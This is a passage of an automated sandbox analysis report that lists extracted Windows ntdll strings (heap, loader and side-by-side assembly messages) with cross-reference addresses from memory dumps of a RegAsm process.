                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                          • API String ID: 0-861424205
                                                                                          Strings
                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 032681E5
                                                                                          • LdrpInitializeImportRedirection, xrefs: 03268177, 032681EB
                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 03268170
                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 03268181, 032681F5
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0322C6C3
                                                                                          • LdrpInitializeProcess, xrefs: 0322C6C4
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                          • API String ID: 0-475462383
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                          • API String ID: 0-3127649145
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                          • API String ID: 0-3393094623
                                                                                          Strings
                                                                                          • Kernel-MUI-Language-SKU, xrefs: 0321542B
                                                                                          • WindowsExcludedProcs, xrefs: 0321522A
                                                                                          • Kernel-MUI-Language-Allowed, xrefs: 0321527B
                                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 03215352
                                                                                          • Kernel-MUI-Number-Allowed, xrefs: 03215247
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                          • API String ID: 0-258546922
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                          • API String ID: 0-2518169356
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-1975516107
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                          • API String ID: 0-3061284088
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                          • API String ID: 0-3178619729
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-3570731704
                                                                                          Strings
                                                                                          • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03257D03
                                                                                          • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03257D56
                                                                                          • SsHd, xrefs: 0320A885
                                                                                          • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03257D39
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                          Strings
                                                                                          • HEAP[%wZ]: , xrefs: 032554D1, 03255592
                                                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 032554ED
                                                                                          • HEAP: , xrefs: 032554E0, 032555A1
                                                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 032555AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                          Strings
                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 032622B6
                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 032621D9, 032622B1
                                                                                          • .Local, xrefs: 032228D8
                                                                                          • SXS: %s() passed the empty activation context, xrefs: 032621DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                          Strings
                                                                                          • HEAP[%wZ]: , xrefs: 03203255
                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0320327D
                                                                                          • HEAP: , xrefs: 03203264
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                          Strings
                                                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 031F1728
                                                                                          • HEAP[%wZ]: , xrefs: 031F1712
                                                                                          • HEAP: , xrefs: 031F1596
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $@
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                          • API String ID: 0-318774311
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %$&$@
                                                                                          • API String ID: 0-1537733988
                                                                                          Strings
                                                                                          • GlobalizationUserSettings, xrefs: 032CB834
                                                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 032CB82A
                                                                                          • TargetNtPath, xrefs: 032CB82F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                          • API String ID: 0-505981995
                                                                                          Strings
                                                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0324E6C6
                                                                                          • HEAP[%wZ]: , xrefs: 0324E6A6
                                                                                          • HEAP: , xrefs: 0324E6B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                          • API String ID: 0-1340214556
                                                                                          Strings
                                                                                          • HEAP[%wZ]: , xrefs: 0329DC12
                                                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0329DC32
                                                                                          • HEAP: , xrefs: 0329DC1F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                          • API String ID: 0-3815128232
                                                                                          Strings
                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 032682DE
                                                                                          • Failed to reallocate the system dirs string !, xrefs: 032682D7
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 032682E8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-1783798831
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 03261B4A
                                                                                          • LdrpAllocateTls, xrefs: 03261B40
                                                                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03261B39
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                          • API String ID: 0-4274184382
                                                                                          Strings
                                                                                          • @, xrefs: 032AC1F1
                                                                                          • PreferredUILanguages, xrefs: 032AC212
                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 032AC1C5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                          • API String ID: 0-2968386058
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                          • API String ID: 0-1373925480
                                                                                          Strings
                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03274888
                                                                                          • LdrpCheckRedirection, xrefs: 0327488F
                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 03274899
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                          • API String ID: 0-3154609507
                                                                                          Strings
                                                                                          • SXS: %s() passed the empty activation context data, xrefs: 032629FE
                                                                                          • RtlCreateActivationContext, xrefs: 032629F9
                                                                                          • Actx , xrefs: 032233AC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                          • API String ID: 0-859632880
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 03261A51
                                                                                          • LdrpInitializeTls, xrefs: 03261A47
                                                                                          • DLL "%wZ" has TLS information at %p, xrefs: 03261A40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                          • API String ID: 0-931879808
                                                                                          Strings
                                                                                          • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0323127B
                                                                                          • @, xrefs: 032312A5
                                                                                          • BuildLabEx, xrefs: 0323130F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                          • API String ID: 0-3051831665
                                                                                          Strings
                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 032720F3
                                                                                          • LdrpInitializationFailure, xrefs: 032720FA
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 03272104
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-2986994758
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___swprintf_l
                                                                                          • String ID: #%u
                                                                                          • API String ID: 48624451-232158463
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$@
                                                                                          • API String ID: 0-149943524
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `$`
                                                                                          • API String ID: 0-197956300
                                                                                          Strings
                                                                                          • ResIdCount less than 2., xrefs: 0324EEC9
                                                                                          • Failed to retrieve service checksum., xrefs: 0324EE56
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                          • API String ID: 0-863616075
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: Legacy$UEFI
                                                                                          • API String ID: 2994545307-634100481
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$$
                                                                                          • API String ID: 0-233714265
                                                                                          Strings
                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 031FA2FB
                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 031FA309
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                          • API String ID: 0-2876891731
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .Local\$@
                                                                                          • API String ID: 0-380025441
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: MUI
                                                                                          • API String ID: 0-1339004836
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: P`vRbv
                                                                                          • API String ID: 0-2392986850
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (
                                                                                          • API String ID: 0-3887548279
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PATH
                                                                                          • API String ID: 0-1036084923
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: GlobalTags
                                                                                          • API String ID: 0-1106856819
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
